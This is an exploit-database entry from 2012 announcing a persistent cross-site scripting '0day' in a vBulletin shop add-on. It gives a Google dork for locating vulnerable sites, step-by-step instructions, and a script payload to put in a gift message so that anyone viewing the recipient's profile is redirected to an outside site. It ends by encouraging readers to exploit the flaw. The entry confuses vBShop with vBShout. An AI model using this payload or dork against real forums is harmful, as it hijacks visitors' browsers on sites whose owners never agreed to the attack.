vBshop persistent Persisstant XSS
| EKU-ID: 1775 | CVE: | OSVDB-ID: |
| Author: ToiL | Published: 2012-03-27 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1775 | CVE: | OSVDB-ID: |
| Author: ToiL | Published: 2012-03-27 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: vBshop persistent XSS 0day
# Google Dork: "DragonByte Technologies Ltd" vbshout
# Date: 25/3/2012 9:32 PM #EST
# Author: ToiL
# Software Link: http://www.dragonbyte-tech.com/
# Version: all
# Tested on: all
# CVE : XSS
#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by
www.Bugabuse.net/<http://www.bugabuse.net/>
#Have fun, And happy exploiting.
######Guide########
Go to vBshop
Gift an item to aother user.
In the 'message to user' put:
<script>top.location='https://www.bugabuse.net/';</script>
Send the item off.
Go to the users profile that you gifted
Boom. Pers. XSS.
Edit to your likeing.